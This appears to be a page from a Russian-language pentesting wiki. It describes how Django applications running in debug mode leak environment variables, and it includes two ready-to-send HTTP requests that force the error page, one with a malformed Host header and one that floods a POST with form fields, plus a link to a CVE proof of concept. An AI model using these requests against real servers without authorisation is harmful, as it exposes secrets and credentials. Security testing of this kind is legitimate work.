Security

Debug mode

Source: https://t.me/webpwn/337

ΠŸΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΡ Π½Π° Django Π² debug Ρ€Π΅ΠΆΠΈΠΌΠ΅ Ρ€Π°ΡΠΊΡ€Ρ‹Π²Π°ΡŽΡ‚ содСрТимоС environment ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹Ρ… ΠΏΡ€ΠΈ Π½Π΅ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚Π°Π½Π½ΠΎΠΌ ΠΈΡΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠΈ.

НСсмотря Π½Π° Π½Π°Π»ΠΈΡ‡ΠΈΠ΅ автоматичСского сокрытия Π·Π½Π°Ρ‡Π΅Π½ΠΈΠΉ, для ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹Ρ… ΡΠΎΠΎΡ‚Π²Π΅Ρ‚ΡΡ‚Π²ΡƒΡŽΡ‰ΠΈΡ… рСгулярному Π²Ρ‹Ρ€Π°ΠΆΠ΅Π½ΠΈΡŽ API|TOKEN|KEY|SECRET|PASS|SIGNATURE, часто это ΠΏΡ€ΠΈΠ²ΠΎΠ΄ΠΈΡ‚ ΠΊ ΡƒΡ‚Π΅Ρ‡ΠΊΠ°ΠΌ Ρ‡Π΅Ρ€Π΅Π· нСстандартныС ΠΈΠΌΠ΅Π½Π° ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹Ρ….

Если ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ debug Ρ€Π΅ΠΆΠΈΠΌ ΠΌΠΎΠΆΠ½ΠΎ просто ΠΎΠ±Ρ€Π°Ρ‚ΠΈΠ²ΡˆΠΈΡΡŒ ΠΊ Π½Π΅ΡΡƒΡ‰Π΅ΡΡ‚Π²ΡƒΡŽΡ‰Π΅ΠΉ страницС, Ρ‚ΠΎ Π²Ρ‹Π·Π²Π°Ρ‚ΡŒ exception ΠΈΠ½ΠΎΠ³Π΄Π° Π±Ρ‹Π²Π°Π΅Ρ‚ ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠ°Ρ‚ΠΈΡ‡Π½ΠΎ. Π”Π°ΠΆΠ΅ с раскрытиСм ΡΡƒΡ‰Π΅ΡΡ‚Π²ΡƒΡŽΡ‰ΠΈΡ… Π² ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠΈ ΠΏΡƒΡ‚Π΅ΠΉ Ρ‡Π΅Ρ€Π΅Π· 404-ΡƒΡŽ страницу.

Но ΡΡƒΡ‰Π΅ΡΡ‚Π²ΡƒΡŽΡ‚ ΠΈ Π±ΠΎΠ»Π΅Π΅ ΡƒΠ½ΠΈΠ²Π΅Ρ€ΡΠ°Π»ΡŒΠ½Ρ‹Π΅ ΠΏΠΎΠ΄Ρ…ΠΎΠ΄Ρ‹.

ΠŸΡ€ΠΈΠΌΠ΅Ρ€ 1

НСстандартныС символы Π² Host. ΠŸΡ€Π°Π²Π΄Π° с ΡƒΡ‡Π΅Ρ‚ΠΎΠΌ ΠΎΠ±Π»Π°Ρ‡Π½Ρ‹Ρ… сСрвисов этот Π²Π°Ρ€ΠΈΠ°Π½Ρ‚ срабатываСт Ρ€Π΅Π΄ΠΊΠΎ.

GET / HTTP/1.1
Host: '"

Invalid HTTP_HOST header: '\'"'. The domain name provided is not valid according to RFC 1034/1035.

ΠŸΡ€ΠΈΠΌΠ΅Ρ€ 2

ИспользованиС большСго количСства ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹Ρ… Π² POST, Ρ‡Π΅ΠΌ ΡƒΠΊΠ°Π·Π°Π½ΠΎ Π² настройкС DATA_UPLOAD_MAX_NUMBER_FIELDS (ΠΏΠΎ ΡƒΠΌΠΎΠ»Ρ‡Π°Π½ΠΈΡŽ 1000).

Для эксплуатации Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΠΎ Π½Π°ΠΉΡ‚ΠΈ любой Ρ€ΠΎΡƒΡ‚, ΠΏΠΎΠ΄Π΄Π΅Ρ€ΠΆΠΈΠ²Π°ΡŽΡ‰ΠΈΠΉ POST запросы, ΠΈ Π² Ρ€Π΅Π΄ΠΊΠΈΡ… случаях ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ Π²Π°Π»ΠΈΠ΄Π½ΠΎΠ΅ Π·Π½Π°Ρ‡Π΅Π½ΠΈΠ΅ CSRF Ρ‚ΠΎΠΊΠ΅Π½Π° Π½Π° страницС.

POST / HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Cookie: csrftoken=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;
Content-Length: 3093
 
csrfmiddlewaretoken=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&x=&x=&x=&x=[..1000 Ρ€Π°Π·..]&x=&x=&x=

CVEs

CVE-2022-34265

PoC & Description: https://github.com/aeyesec/CVE-2022-34265

PreviousDjango SignalsNextTornado

Last updated